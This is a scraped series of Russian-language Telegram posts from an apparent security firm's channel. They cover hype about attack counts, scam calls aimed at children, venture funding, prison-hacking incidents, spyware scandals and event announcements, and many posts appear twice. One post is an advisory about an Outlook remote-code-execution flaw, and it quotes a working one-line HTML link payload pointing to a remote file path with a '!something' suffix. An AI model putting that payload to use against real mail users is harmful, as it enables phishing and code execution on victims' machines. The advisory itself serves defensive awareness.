Нас ежедневно атакуют 10 миллионов раз
Такие заголовки откровенно раздражают специалистов, но мы хотим объяснить откуда вообще берутся эти заявления.
Чаще всего о "миллионах" атак говорят люди, которые очень далеки от ИБ и которые хотят произвести некое впечатление на аудиторию. Которая, зачастую, тоже далекая от ИБ и легко представляет, как "тысячи хакеров" трудятся чтобы атаковать кого-то в течении одного дня.
А что же на самом деле? Зачастую это просто выгрузка количества инцидентов и срабатываний средств защиты на внешнем периметре компании. Значительная часть которых - это по-сути фоновый шум. Ежесекундно каждый узел в Интернете автоматизировано сканируется с совершенно разными целями. И каждый запрос сканера любят считать и называть "атакой". Отсюда и совершенно неадекватные цифры количества "атак".
А какие вообще бывают сканы?
1. Сканирование портов. По сути инвентаризация всех сервисов/приложений, которые доступны из Интернета. В чистом виде - не несет злонамеренного подтекста и уголовно не наказуема.
2. Сканирование на уязвимости. Поиск уязвимостей у доступных из Интернета сервисов. Многие проверки подразумевают отправку пакетов, которые можно однозначно определить как "атака", поэтому обычно подобное сканирование считается уголовно наказуемым. Прецеденты уголовного преследования за такое в РФ были, результаты - условный срок по 272 УК РФ.
Но зав. кафедры, у которого я учился, рассказывал нам шикарную аналогию:
1. Сканирование на уязвимости - похоже на попытку взломать дверь отмычкой, уголовно наказуемо.
2. Сканирование портов - похоже на то, что вы стоите у двери и смотрите через замочную скважину. Наказать за это не могут, но иногда могут за это спустить с лестницы.
А кто сканирует ваш сервер?
1. Злоумышленники - с понятными всеми целями. Количество атак обычно зависит от вашей платежеспособности.
2. Баг хантеры, исследователи уязвимостей - в попытке найти уязвимость и попросить за нее вознаграждение, если такое предлагается или попробовать если компания такое не предлагает. Количество — см. пункт 1.
3. Сервисы мониторинга Интернета - для актуализации своих баз. Они монетизируют поиск по этим базам, упрощают жизнь многим исследователям/компаниям. Их активность наиболее выражена, это самая часто встречающаяся категория.
4. Любопытные студенты - которые пишут курсовую по сканированию интернета, или делают свой домашний проект. Редки.
5. Невнимательные люди - которые просто ошиблись с маской/адресом и случайно запустили скане не туда! В целом, бывают, но их доля в сравнении с роботами невелика.
Поэтому называть атакой такое количество постоянный автоматизированной фоновой активности у специалистов просто язык не поворачивается. Да и не в количестве дело — действия одной грамотной команды злоумышленников гораздо опаснее, чем "миллионы" сканирований внешнего периметра.
Такие заголовки откровенно раздражают специалистов, но мы хотим объяснить откуда вообще берутся эти заявления.
Чаще всего о "миллионах" атак говорят люди, которые очень далеки от ИБ и которые хотят произвести некое впечатление на аудиторию. Которая, зачастую, тоже далекая от ИБ и легко представляет, как "тысячи хакеров" трудятся чтобы атаковать кого-то в течении одного дня.
А что же на самом деле? Зачастую это просто выгрузка количества инцидентов и срабатываний средств защиты на внешнем периметре компании. Значительная часть которых - это по-сути фоновый шум. Ежесекундно каждый узел в Интернете автоматизировано сканируется с совершенно разными целями. И каждый запрос сканера любят считать и называть "атакой". Отсюда и совершенно неадекватные цифры количества "атак".
А какие вообще бывают сканы?
1. Сканирование портов. По сути инвентаризация всех сервисов/приложений, которые доступны из Интернета. В чистом виде - не несет злонамеренного подтекста и уголовно не наказуема.
2. Сканирование на уязвимости. Поиск уязвимостей у доступных из Интернета сервисов. Многие проверки подразумевают отправку пакетов, которые можно однозначно определить как "атака", поэтому обычно подобное сканирование считается уголовно наказуемым. Прецеденты уголовного преследования за такое в РФ были, результаты - условный срок по 272 УК РФ.
Но зав. кафедры, у которого я учился, рассказывал нам шикарную аналогию:
1. Сканирование на уязвимости - похоже на попытку взломать дверь отмычкой, уголовно наказуемо.
2. Сканирование портов - похоже на то, что вы стоите у двери и смотрите через замочную скважину. Наказать за это не могут, но иногда могут за это спустить с лестницы.
А кто сканирует ваш сервер?
1. Злоумышленники - с понятными всеми целями. Количество атак обычно зависит от вашей платежеспособности.
2. Баг хантеры, исследователи уязвимостей - в попытке найти уязвимость и попросить за нее вознаграждение, если такое предлагается или попробовать если компания такое не предлагает. Количество — см. пункт 1.
3. Сервисы мониторинга Интернета - для актуализации своих баз. Они монетизируют поиск по этим базам, упрощают жизнь многим исследователям/компаниям. Их активность наиболее выражена, это самая часто встречающаяся категория.
4. Любопытные студенты - которые пишут курсовую по сканированию интернета, или делают свой домашний проект. Редки.
5. Невнимательные люди - которые просто ошиблись с маской/адресом и случайно запустили скане не туда! В целом, бывают, но их доля в сравнении с роботами невелика.
Поэтому называть атакой такое количество постоянный автоматизированной фоновой активности у специалистов просто язык не поворачивается. Да и не в количестве дело — действия одной грамотной команды злоумышленников гораздо опаснее, чем "миллионы" сканирований внешнего периметра.
BNN
JPMorgan Sees Hacking Attempts on Systems Double to 45 Billion Per Day
JPMorgan Chase & Co. has seen an increase in hackers attempting to infiltrate its systems as the Wall Street giant and its rivals continue to deal with a surge in global cybercrime, according to Mary Callahan Erdoes, who leads JPMorgan’s asset and wealth…
👍16🔥11❤2👨💻1
От кражи денег к атакам на детей: фокус колл-центров меняется!
Недавно в России произошла очень показательная история: злоумышленники позвонили 10-ти летнему ребенку и, представившись сотрудниками коммунальных служб, убеждали его открыть газ в конфорках плиты, чтобы таким образом устроить взрыв. Понятно, что речь уже не о киберкриминале: финансовой мотивации тут ноль. К счастью, в этой истории все закончилось хорошо — мальчик сообщил родителям, а те обратились в правоохранительные органы. Но попытка, очевидно, не последняя, и подобные случаи совершенно точно еще будут.
Что важно: очевидно, что тактика колл-центров меняется. От кражи денег и поджогов военкоматов они переходят к использованию детей. По-сути, имела место попытка организации теракта чужими руками. И если пенсионеры сейчас превратились в едва ли не самую подозрительную категорию, то с детьми ситуация гораздо сложнее. И на "той стороне" это понимают.
К слову, в декабре на "КодИБ Итоги" мы уже говорили об этом — что именно дети станут новой и ожидаемой целью манипуляций. "Новой" — потому что раньше тратить на них время имело смысл только в случае очень узконаправленных атаках, конечной целью которых все равно были взрослые. Сейчас картина изменилась.
Лучший способ противодействовать — предупредить. Родители и учителя! Объясните детям, что о любой такой ситуации нужно сообщать взрослым и не делать ничего самостоятельно!
Недавно в России произошла очень показательная история: злоумышленники позвонили 10-ти летнему ребенку и, представившись сотрудниками коммунальных служб, убеждали его открыть газ в конфорках плиты, чтобы таким образом устроить взрыв. Понятно, что речь уже не о киберкриминале: финансовой мотивации тут ноль. К счастью, в этой истории все закончилось хорошо — мальчик сообщил родителям, а те обратились в правоохранительные органы. Но попытка, очевидно, не последняя, и подобные случаи совершенно точно еще будут.
Что важно: очевидно, что тактика колл-центров меняется. От кражи денег и поджогов военкоматов они переходят к использованию детей. По-сути, имела место попытка организации теракта чужими руками. И если пенсионеры сейчас превратились в едва ли не самую подозрительную категорию, то с детьми ситуация гораздо сложнее. И на "той стороне" это понимают.
К слову, в декабре на "КодИБ Итоги" мы уже говорили об этом — что именно дети станут новой и ожидаемой целью манипуляций. "Новой" — потому что раньше тратить на них время имело смысл только в случае очень узконаправленных атаках, конечной целью которых все равно были взрослые. Сейчас картина изменилась.
Лучший способ противодействовать — предупредить. Родители и учителя! Объясните детям, что о любой такой ситуации нужно сообщать взрослым и не делать ничего самостоятельно!
Lenta.RU
Террористы с Украины пытались заставить ребенка взорвать дом в Москве
В Москве телефонные террористы попытались взорвать многоэтажку в Кунцево. Якобы сотрудник газовой службы позвонил на домашний номер десятилетнему мальчику с Ельцинской улицы, когда его родителей не было дома. Он попросил ребенка срочно проверить напор газа:…
🤬530👍53❤16🤯10🤔5👎4🔥2
Forwarded from PLUSworld, журнал ПЛАС
Кибербезопасность в финансовой индустрии. Прогноз на 2024 года
Как отмечают специалисты, принципиальной разницы между кибератаками 2023 и 2022 годов не наблюдется. Скорее всего, и в 2024 году мы будем свидетелями тех же самых видов атак, но больше, злее и интенсивнее. Подробнее о кибербезопасности в финансовой индустрии порталу PLUSworld рассказывает сооснователь компании «Третья сторона» Антон Бочкарев.
https://plusworld.ru/articles/58213/
Как отмечают специалисты, принципиальной разницы между кибератаками 2023 и 2022 годов не наблюдется. Скорее всего, и в 2024 году мы будем свидетелями тех же самых видов атак, но больше, злее и интенсивнее. Подробнее о кибербезопасности в финансовой индустрии порталу PLUSworld рассказывает сооснователь компании «Третья сторона» Антон Бочкарев.
https://plusworld.ru/articles/58213/
👍7🔥1
Громкие, но пустые заголовки
Мы уже писали о том, что ужасные истории про "10 миллионов атак каждый день" не вполне соответствуют действительности, хотя звучат страшно и громко. С утечками похожая история.
Сейчас же пишут о следующем — в сеть утекло 12 терабайт пользовательских данных, причем в списке фигурируют Weibo, MySpace, Twitter, VK и tg. В оригинальном материале произошедшее называют "матерью всех утечек" и другими громкими словами. То есть масштаб — да, гигантский. Но только если начинать разбираться — выяснится, что по-сути это агрегация множества старых утечек, а данные ВК там вообще 2011 года (основатели 3side тогда еще в университетах учились).
Масштаб вроде бы огромный, но реального ущерба от нее куда меньше, чем могло бы показаться. Многие гораздо более "мелкие" утечки в реальности несут гораздо большую угрозу. И размер тут — далеко не самое главное.
Есть каналы, которые верифицируют утечки и реальный ущерб — всегда лучше опираться на них.
Мы уже писали о том, что ужасные истории про "10 миллионов атак каждый день" не вполне соответствуют действительности, хотя звучат страшно и громко. С утечками похожая история.
Сейчас же пишут о следующем — в сеть утекло 12 терабайт пользовательских данных, причем в списке фигурируют Weibo, MySpace, Twitter, VK и tg. В оригинальном материале произошедшее называют "матерью всех утечек" и другими громкими словами. То есть масштаб — да, гигантский. Но только если начинать разбираться — выяснится, что по-сути это агрегация множества старых утечек, а данные ВК там вообще 2011 года (основатели 3side тогда еще в университетах учились).
Масштаб вроде бы огромный, но реального ущерба от нее куда меньше, чем могло бы показаться. Многие гораздо более "мелкие" утечки в реальности несут гораздо большую угрозу. И размер тут — далеко не самое главное.
Есть каналы, которые верифицируют утечки и реальный ущерб — всегда лучше опираться на них.
Telegram
3side кибербезопасности
Нас ежедневно атакуют 10 миллионов раз
Такие заголовки откровенно раздражают специалистов, но мы хотим объяснить откуда вообще берутся эти заявления.
Чаще всего о "миллионах" атак говорят люди, которые очень далеки от ИБ и которые хотят произвести некое…
Такие заголовки откровенно раздражают специалистов, но мы хотим объяснить откуда вообще берутся эти заявления.
Чаще всего о "миллионах" атак говорят люди, которые очень далеки от ИБ и которые хотят произвести некое…
👍12🔥2👨💻1
Зимний ProIT Fest: теплее тёплого!
Шикарный лозунг, ведь именно на летнем ProIT Fest было очень холодно и все свое выступление я пил горячий чай)
Ну а 10-11 февраля приглашаю всех в пространство FREEDOM в Санкт-Петербурге, послушать небольшой доклад про "Атаки на GPT", доклад очень легкий, как и полагается на ProIT Fest.
GPT сейчас на хайпе, многие компании стремятся если не создать свой аналог, то хотя бы внедрить открытую версию. Но как и всякий новый вид сервиса, далеко не все понимают, как его защищать. Мы поговорим о том:
- В чем ключевые отличия между ними и привычными веб-приложениями?
- Какие уязвимости наиболее актуальны для GPT и прочих LLM?
- Чем некоторые атаки похожи на социальную инженерию?
- К каким рискам может привести взлом подобного сервиса?
- Какие есть тестовые среды и тренажеры для отработки подобных взломов?
Всего будет 11 секций, например, Vision (Product, Design, Front, Marketing), C Level (CEO, CMO, COO, CTO, etc), BDSM (BizDev, Sales, Marketing), Разработка на Python (Dev, QA, DevOps, DS), System Design (Архитектура Бэка), HypeLoad (ИИ, Blockchain, Scrum и прочие тренды) и прочие. Подробнее на сайте.
Организаторы спикерам выдали единый (не реферальный) промокод на скидку в 20%: SEEYOU
Встретимся на докладе!
Шикарный лозунг, ведь именно на летнем ProIT Fest было очень холодно и все свое выступление я пил горячий чай)
Ну а 10-11 февраля приглашаю всех в пространство FREEDOM в Санкт-Петербурге, послушать небольшой доклад про "Атаки на GPT", доклад очень легкий, как и полагается на ProIT Fest.
GPT сейчас на хайпе, многие компании стремятся если не создать свой аналог, то хотя бы внедрить открытую версию. Но как и всякий новый вид сервиса, далеко не все понимают, как его защищать. Мы поговорим о том:
- В чем ключевые отличия между ними и привычными веб-приложениями?
- Какие уязвимости наиболее актуальны для GPT и прочих LLM?
- Чем некоторые атаки похожи на социальную инженерию?
- К каким рискам может привести взлом подобного сервиса?
- Какие есть тестовые среды и тренажеры для отработки подобных взломов?
Всего будет 11 секций, например, Vision (Product, Design, Front, Marketing), C Level (CEO, CMO, COO, CTO, etc), BDSM (BizDev, Sales, Marketing), Разработка на Python (Dev, QA, DevOps, DS), System Design (Архитектура Бэка), HypeLoad (ИИ, Blockchain, Scrum и прочие тренды) и прочие. Подробнее на сайте.
Организаторы спикерам выдали единый (не реферальный) промокод на скидку в 20%: SEEYOU
Встретимся на докладе!
👍4🔥3❤1
Forwarded from Garantex News Russia
Присоединяйтесь к нам 1 февраля в 19:00 по МСК на АМА-сессию и получите ответы на ваши вопросы по кибербезопасности при работе с криптовалютой.
Свои вопросы вы сможете задать в по ссылке. Авторы лучших вопросов получат подарки от 3side.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥2👍1
Российский венчур — между Кенией и Нигерией?
Этот пост будет немного не про ИБ как таковую, но он напрямую связан со многими молодыми и не очень ИБ-компаниями. Если коротко — он про то, что российская венчурная индустрия за несколько лет деградировала до уровня средней африканской страны. Ушли не только западные — ушли даже российские инвесторы. А те, кто остался, иногда прямо говорят: "будете выходить на международные рынки — приходите" (в целом норм предложение). А вообще, 5 сделок в месяц (в 2023 году в России) — это полный мрак. Для понимания, в США — около 600, в Израиле — около 30. Про объемы просто промолчу.
Венчурный инвестор — это человек, который пытается проинвестировать в компании на ранних стадиях. То есть найти условных Джобса и Возняка в тот момент, когда они еще сидят в гараже, и купить часть их компании. Все в выигрыше — компания получает деньги, инвестор — в перспективе получает прибыль. Короче, венчур — это про заработок на росте стоимости стартапов. Тут все понятно. И видно, что в России хотят построить индустрию, только пока не выходит.
А теперь прикол. Вокруг собственно венчурного инвестирования всегда развивается "поддерживающая" инфраструктура, задача которой — помогать компаниям расти и находить инвевторов. За последний год нас звали десятка в полтора акселераторов. В теории, аксель — это хороший способ для молодой компании получить консультации, инвестиции и связи. Разумеется, большая часть акселераторов — платные, причем зачастую они находятся или на прямой господдержке, или предлагают стартапам получить таковую. Проблема в том, что по факту аксель не дает доступа к инвестициям — потому что российский венчур, повторюсь, схлопнулся.
Получается смешная картина — на фактически мертвом рынке множество компаний продает ... ну не воздух, но нечто подобное. Акселераторы могут давать очень хорошую продуктовую экспертизу, вот только стартапу, которому нужны деньги для разработки продукта она поможет примерно как аспирин на 3 стадии рака. И в итоге получается, что "акселерация" превращается в отдельный бизнес, причем довольно (для компаний) бестолковый. Учиться на экономиста в 90-х было круто, учиться на экономиста в конце нулевых — грустно. Здесь та же история.
Мы вопрос с инвестициями для себя решили, хоть и немного "неортодоксально". Но текущее состояние венчурного рынка в России — это полный мрак. Может быть, через пару лет что-то изменится, а пока оно такое, какое есть.
Этот пост будет немного не про ИБ как таковую, но он напрямую связан со многими молодыми и не очень ИБ-компаниями. Если коротко — он про то, что российская венчурная индустрия за несколько лет деградировала до уровня средней африканской страны. Ушли не только западные — ушли даже российские инвесторы. А те, кто остался, иногда прямо говорят: "будете выходить на международные рынки — приходите" (в целом норм предложение). А вообще, 5 сделок в месяц (в 2023 году в России) — это полный мрак. Для понимания, в США — около 600, в Израиле — около 30. Про объемы просто промолчу.
Венчурный инвестор — это человек, который пытается проинвестировать в компании на ранних стадиях. То есть найти условных Джобса и Возняка в тот момент, когда они еще сидят в гараже, и купить часть их компании. Все в выигрыше — компания получает деньги, инвестор — в перспективе получает прибыль. Короче, венчур — это про заработок на росте стоимости стартапов. Тут все понятно. И видно, что в России хотят построить индустрию, только пока не выходит.
А теперь прикол. Вокруг собственно венчурного инвестирования всегда развивается "поддерживающая" инфраструктура, задача которой — помогать компаниям расти и находить инвевторов. За последний год нас звали десятка в полтора акселераторов. В теории, аксель — это хороший способ для молодой компании получить консультации, инвестиции и связи. Разумеется, большая часть акселераторов — платные, причем зачастую они находятся или на прямой господдержке, или предлагают стартапам получить таковую. Проблема в том, что по факту аксель не дает доступа к инвестициям — потому что российский венчур, повторюсь, схлопнулся.
Получается смешная картина — на фактически мертвом рынке множество компаний продает ... ну не воздух, но нечто подобное. Акселераторы могут давать очень хорошую продуктовую экспертизу, вот только стартапу, которому нужны деньги для разработки продукта она поможет примерно как аспирин на 3 стадии рака. И в итоге получается, что "акселерация" превращается в отдельный бизнес, причем довольно (для компаний) бестолковый. Учиться на экономиста в 90-х было круто, учиться на экономиста в конце нулевых — грустно. Здесь та же история.
Мы вопрос с инвестициями для себя решили, хоть и немного "неортодоксально". Но текущее состояние венчурного рынка в России — это полный мрак. Может быть, через пару лет что-то изменится, а пока оно такое, какое есть.
👍7🔥7🤔6👨💻2😁1
Киберриски — топ-1 в мире по мнению страховой группы Allianz
Мы тут неожиданно наткнулись на отчет страховой группы Allianz по ключевым рискам в 2023 году, и с удивлением обнаружили, что по их мнению риски ИБ снова оказались главными угрозами среди всех возможных. На втором месте — прерывание бизнеса, дальше — макроэкономика, энергетические кризисы и изменения в регулировании (короче, санкции). К слову, за год снизились только "природные и стихийные" риски — изменение климата, катастрофы и пожары.
"Сайбер" не попал в топ-3 только для двух стран — Китая и Австралии. С Китаем все понятно (с их-то интернет-архитектурой), про Австралию мы знаем мало, но там в лидерах климат и природные катастрофы. В общем, такие дела, занимайтесь безопасностью.
Мы тут неожиданно наткнулись на отчет страховой группы Allianz по ключевым рискам в 2023 году, и с удивлением обнаружили, что по их мнению риски ИБ снова оказались главными угрозами среди всех возможных. На втором месте — прерывание бизнеса, дальше — макроэкономика, энергетические кризисы и изменения в регулировании (короче, санкции). К слову, за год снизились только "природные и стихийные" риски — изменение климата, катастрофы и пожары.
"Сайбер" не попал в топ-3 только для двух стран — Китая и Австралии. С Китаем все понятно (с их-то интернет-архитектурой), про Австралию мы знаем мало, но там в лидерах климат и природные катастрофы. В общем, такие дела, занимайтесь безопасностью.
👍6🔥6🤣1
Всем привет!
У нас тут вовсю идет стрим с Garantex про кибербезопасность и крипту.
Присоединяйтесь!
У нас тут вовсю идет стрим с Garantex про кибербезопасность и крипту.
Присоединяйтесь!
🤯2
Forwarded from Garantex Russia Chat
Присоединяйтесь к АМА-сессии с экспертом по кибербезопасности Антоном Бочкаревым на канале Garantex прямо сейчас.
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Как защитить свои криптоактивы от взлома
Добро пожаловать на канал Garantex!
На этом прямом эфире мы ответили на вопросы:
✅ Как эффективно уберечь свою технику от взлома?
✅ Как можно и нельзя хранить пароли?
✅ Как понять, что вы в максимальной зоне риска?
✅ Популярные схемы взломов частных аккаунтов…
На этом прямом эфире мы ответили на вопросы:
✅ Как эффективно уберечь свою технику от взлома?
✅ Как можно и нельзя хранить пароли?
✅ Как понять, что вы в максимальной зоне риска?
✅ Популярные схемы взломов частных аккаунтов…
🔥3👍2
Взлом тюрьмы
В кино неоднократно показывали, как некий хакер ломает тюрьму, и толпы заключённых бегут на свободу!
Например, эпизод - "eps1.5_br4ve-trave1er.asf" сериала Мистер Робот.
В 2017 году злоумышленник из Мичигана попытался освободить своего друга из тюрьмы успешно взломав один из компьютеров администрации, с помощью классического двойного фишинга. Сначала было отправлено письмо, а потом он звонил в тюрьму и убедил сотрудников письмо открыть и запустить вредонос, объяснял все срочными обновлениями.
Далее получил учетные данные одного из сотрудников и распространил свой вирус на другие компьютеры администрации.
В итоге он получил доступ к:
- Системе XJail (осуществляет мониторинга и отслеживание заключённых)
- Данным о показаниях
- Внутренним данным тюрьмы
Собрал базу данных более чем 1500 сотрудников, включая их логины, пароли и персональные данные. А позднее он перешел к главной цели, изменил дату освобождения одного из заключенных - его друга.
Казалось бы успех? Но нет, в тюрьме было всего около 200 заключенных мужчин и они хорошо знали даты освобождения друг друга. Начали расследование об изменении данных, привлекли частную компанию для расследования, и злоумышленника быстро нашли.
Но, на днях случился еще один и уже УСПЕШНЫЙ эпизод освобождения. В 2020 году был задержан по подозрению в убийстве 30-летний Зайон Ривер Шака. Расследование шло своим чередом, подозреваемого регулярно возили в суд на слушания, пока судебные и телефонные и налоговые системы округа Клейтон Джорджии не были взломаны. Туда подозреваемого перевели временно, на время очередных слушаний. Взлом систем округа сопровождался не модификацией данных, а цитата "широкомасштабным отключением систем", скорее всего дело рук распространителей шифровальщиков.
И в результате недоступности данных подозреваемого случайно отпустили после слушания, а не вернули в тюрьму. В данный момент его местонахождение неизвестно, ведется розыск.
Теперь ожидаем эпизода целенаправленного освобождения, если уже почти получилось в 2017 и получилось, но случайно в 2024, то это явно вопрос времени!
В кино неоднократно показывали, как некий хакер ломает тюрьму, и толпы заключённых бегут на свободу!
Например, эпизод - "eps1.5_br4ve-trave1er.asf" сериала Мистер Робот.
В 2017 году злоумышленник из Мичигана попытался освободить своего друга из тюрьмы успешно взломав один из компьютеров администрации, с помощью классического двойного фишинга. Сначала было отправлено письмо, а потом он звонил в тюрьму и убедил сотрудников письмо открыть и запустить вредонос, объяснял все срочными обновлениями.
Далее получил учетные данные одного из сотрудников и распространил свой вирус на другие компьютеры администрации.
В итоге он получил доступ к:
- Системе XJail (осуществляет мониторинга и отслеживание заключённых)
- Данным о показаниях
- Внутренним данным тюрьмы
Собрал базу данных более чем 1500 сотрудников, включая их логины, пароли и персональные данные. А позднее он перешел к главной цели, изменил дату освобождения одного из заключенных - его друга.
Казалось бы успех? Но нет, в тюрьме было всего около 200 заключенных мужчин и они хорошо знали даты освобождения друг друга. Начали расследование об изменении данных, привлекли частную компанию для расследования, и злоумышленника быстро нашли.
Но, на днях случился еще один и уже УСПЕШНЫЙ эпизод освобождения. В 2020 году был задержан по подозрению в убийстве 30-летний Зайон Ривер Шака. Расследование шло своим чередом, подозреваемого регулярно возили в суд на слушания, пока судебные и телефонные и налоговые системы округа Клейтон Джорджии не были взломаны. Туда подозреваемого перевели временно, на время очередных слушаний. Взлом систем округа сопровождался не модификацией данных, а цитата "широкомасштабным отключением систем", скорее всего дело рук распространителей шифровальщиков.
И в результате недоступности данных подозреваемого случайно отпустили после слушания, а не вернули в тюрьму. В данный момент его местонахождение неизвестно, ведется розыск.
Теперь ожидаем эпизода целенаправленного освобождения, если уже почти получилось в 2017 и получилось, но случайно в 2024, то это явно вопрос времени!
🔥19👍3😁2❤1
Хакеры в кино
В прошлом посте, я упомянул сериал Мистер Робот. Это хороший пример того, как можно показывать кибербез в кино.
А недавно меня попросили высказаться про наиболее частый образ хакеров в кино, и спросили еще нескольких коллег с ИБ рынка.
А в конце статьи ссылка на гит, с неплохим спискам фильмов/сериалов хоть как-то связанных с хакерами, рекомендую!
Но квинтесенция стеба, как это выглядит тут - https://youtu.be/pgl37R7hILE.
В прошлом посте, я упомянул сериал Мистер Робот. Это хороший пример того, как можно показывать кибербез в кино.
А недавно меня попросили высказаться про наиболее частый образ хакеров в кино, и спросили еще нескольких коллег с ИБ рынка.
А в конце статьи ссылка на гит, с неплохим спискам фильмов/сериалов хоть как-то связанных с хакерами, рекомендую!
Но квинтесенция стеба, как это выглядит тут - https://youtu.be/pgl37R7hILE.
securitymedia.org
Надел капюшон и спас мир: кибербезопасность в кино, сериалах и аниме
Можно ли посмотреть сериал про хакеров и самому стать хакером? Да, но есть нюанс.О том, как кибербезопасность представлена в кинематографе и как образ хакера влияет на будущих ИБ-специалистов – в этой статье
😁7🔥5👍2❤1👨💻1
Ой, а кто это сделал?!
Тут в Иордании очередной скандал, связанный с шпионским ПО от израильтян из NSO Group. Pegus использовали для слежки за оппозиционными активистами. Как говорится, никогда не было, и вот опять.
"Внезапно" выяснилось, что рано или поздно практически любая страна начинает использовать шпионский софт не только для борьбы с наркоторговцами и разными экстремистами, но и для слежки за политическими оппонентами правящей партии. Причем не важно, идет речь об Иордании или Мексике, или о демократической Польше. Разве что в ЕС скандал будет погромче.
Оказывается, если продавать кибероружие, то его могут использовать не по назначению. Ну, или очень даже по назначению.
Хочется добавить голосом Галустяна из Нашей Раши: "Ой, а кто это сделал?" И правда, очень неожиданно. Ничего же не предвещало.
Тут в Иордании очередной скандал, связанный с шпионским ПО от израильтян из NSO Group. Pegus использовали для слежки за оппозиционными активистами. Как говорится, никогда не было, и вот опять.
"Внезапно" выяснилось, что рано или поздно практически любая страна начинает использовать шпионский софт не только для борьбы с наркоторговцами и разными экстремистами, но и для слежки за политическими оппонентами правящей партии. Причем не важно, идет речь об Иордании или Мексике, или о демократической Польше. Разве что в ЕС скандал будет погромче.
Оказывается, если продавать кибероружие, то его могут использовать не по назначению. Ну, или очень даже по назначению.
Хочется добавить голосом Галустяна из Нашей Раши: "Ой, а кто это сделал?" И правда, очень неожиданно. Ничего же не предвещало.
😁28👍7🔥3🤯2👨💻1
3side медиа-партнер форума «ТЕРРИТОРИЯ БЕЗОПАСНОСТИ – 2024: все pro ИБ»
Разместили анонс и приглашаем поучаствовать!
От нас на Форуме будет Антон Бочкарев в качестве слушателя, смело подходите на нетворк.
Разместили анонс и приглашаем поучаствовать!
От нас на Форуме будет Антон Бочкарев в качестве слушателя, смело подходите на нетворк.
👍4🔥1
Forwarded from ComNews Conferences
❕4 апреля 2024 г. в Москве состоится Форум «ТЕРРИТОРИЯ БЕЗОПАСНОСТИ – 2024: все pro ИБ».
🗣 Спикеры КОНФЕРЕНЦИЙ 2024 ГОДА:
🔸 PRO расследования инцидентов: https://www.comnews-conferences.ru/tb2024/ri
🔹 PRO обнаружение угроз: https://www.comnews-conferences.ru/tb2024/ou
🔸 PRO управление уязвимостями: https://www.comnews-conferences.ru/tb2024/uu
🔹 PRO безопасную разработку: https://www.comnews-conferences.ru/tb2024/br
📍 HYATT REGENCY MOSCOW PETROVSKY PARK
💁♂️ Регистрация: https://www.comnews-conferences.ru/tb2024/registration
❗️Участие для руководителей ИБ-департаментов БЕСПЛАТНОЕ!
❗️ При оплате до 1 марта 2024 г. действует льготная стоимость участия для делегатов-слушателей!
✉️ Выступить с докладом на конференциях или стать экспонентном: conf@comnews.ru
🗣 Спикеры КОНФЕРЕНЦИЙ 2024 ГОДА:
🔸 PRO расследования инцидентов: https://www.comnews-conferences.ru/tb2024/ri
🔹 PRO обнаружение угроз: https://www.comnews-conferences.ru/tb2024/ou
🔸 PRO управление уязвимостями: https://www.comnews-conferences.ru/tb2024/uu
🔹 PRO безопасную разработку: https://www.comnews-conferences.ru/tb2024/br
📍 HYATT REGENCY MOSCOW PETROVSKY PARK
💁♂️ Регистрация: https://www.comnews-conferences.ru/tb2024/registration
❗️Участие для руководителей ИБ-департаментов БЕСПЛАТНОЕ!
❗️ При оплате до 1 марта 2024 г. действует льготная стоимость участия для делегатов-слушателей!
✉️ Выступить с докладом на конференциях или стать экспонентном: conf@comnews.ru
👍4❤1🔥1
Меняются технологии, люди остаются
Небольшой развлекательно-исторический лонг о том, как "ловили" первых хакеров и как ломали американскую оборонку. Спойлер: изменилось не так много, как может показаться.
https://telegra.ph/KGB-hakery-The-Illuminatus-02-12
Небольшой развлекательно-исторический лонг о том, как "ловили" первых хакеров и как ломали американскую оборонку. Спойлер: изменилось не так много, как может показаться.
https://telegra.ph/KGB-hakery-The-Illuminatus-02-12
Telegraph
КГБ, хакеры, "The Illuminatus!"
Карл Кох. Родился 22 июля 1965г. Вырос в семье, где мать умерла от рака, когда ему было всего 14, а отец был алкоголиком. В 1979 году на него сильно повлияла трилогия книг "The Illuminatus!", а в 1982, будучи студентом, он купил себе первый компьютер. В…
🔥23👍5🤔1
В продолжение недавнего видеоинтервью для Garantex
Очень детальная и подробная подборка устройств с описанием их функций и преимуществ/недостатков. От себя повторим, что параллельный импорт-игрушка дьявола, и относиться к нему стоит очень — очень осторожно. А полную версию интервью можно посмотреть здесь.
Очень детальная и подробная подборка устройств с описанием их функций и преимуществ/недостатков. От себя повторим, что параллельный импорт-игрушка дьявола, и относиться к нему стоит очень — очень осторожно. А полную версию интервью можно посмотреть здесь.
Telegram
Garantex News Russia
👨💻Какую технику и ПО использовать, чтобы обеспечить свою кибербезопасность?
Делимся советами от Антона Бочкарева — топового российского эксперта по атакующей кибербезопасности и основателя стартапа 3side, который помогает российским компаниям и частным…
Делимся советами от Антона Бочкарева — топового российского эксперта по атакующей кибербезопасности и основателя стартапа 3side, который помогает российским компаниям и частным…
👍4🔥1
Публичный эксплойт на критическую уязвимость Microsoft Outlook
Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!
Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point:
От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.
Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!
Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.
Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
GitHub
GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Microsoft-Outlook-Remote-Code-Execution-Vulnerability - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
🔥16👍1
Добро пожаловать на рынок кибербезопасности, Александр!
